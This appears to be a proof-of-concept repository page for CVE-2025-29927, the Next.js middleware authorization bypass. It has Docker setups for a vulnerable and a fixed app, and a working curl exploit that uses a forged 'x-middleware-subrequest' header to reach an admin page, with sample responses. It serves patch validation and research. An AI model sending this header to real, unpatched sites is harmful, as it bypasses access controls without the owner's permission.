CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source

Associated Vulnerability

Description

Reproduction and fix of the CVE-2025-29927 vulnerability.

Readme

# CVE-2025-29927

Reproduction and fix of the CVE-2025-29927 vulnerability.

```
git clone git@github.com:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
```

In `vulnerable/` there is a version of the application that is vulnerable to the attack. In `fixed/` there is a version of the application that is upgraded to the minimal version that fixes the vulnerability.

> ⚠️ Important: These examples are provided for defenders, researchers, and teams validating patching. Do **not** run these images on public or production networks. Only test on systems you own or where you have explicit written permission.

## Vulnerable version

Reproduction of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
```

### Run the exploit

Run this command, which should get redirected to the login page

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command, which should be able to access the admin page

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...
```

## Fixed version

Fix of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
```

### Run the exploit

Run this command, which should get redirected to the login page

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command, which should now also be redirected to the login page

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

## References

This repository is based on [l1uk/nextjs-middleware-exploit](https://github.com/l1uk/nextjs-middleware-exploit), but adapted for version 15.x of Next.js.

File Snapshot

 [4.0K]  /data/pocs/4924ef3ceb64230136277a76086f90f6c194e544
├── [4.0K]  fixed
│   ├── [ 133]  Dockerfile
│   ├── [ 523]  middleware.js
│   ├── [ 281]  package.json
│   ├── [4.0K]  pages
│   │   ├── [  63]  admin.js
│   │   └── [  63]  login.js
│   └── [ 849]  README.md
├── [1.0K]  LICENSE
├── [2.5K]  README.md
└── [4.0K]  vulnerable
    ├── [ 133]  Dockerfile
    ├── [ 523]  middleware.js
    ├── [ 280]  package.json
    ├── [4.0K]  pages
    │   ├── [  63]  admin.js
    │   └── [  63]  login.js
    └── [ 923]  README.md

5 directories, 14 files

Remarks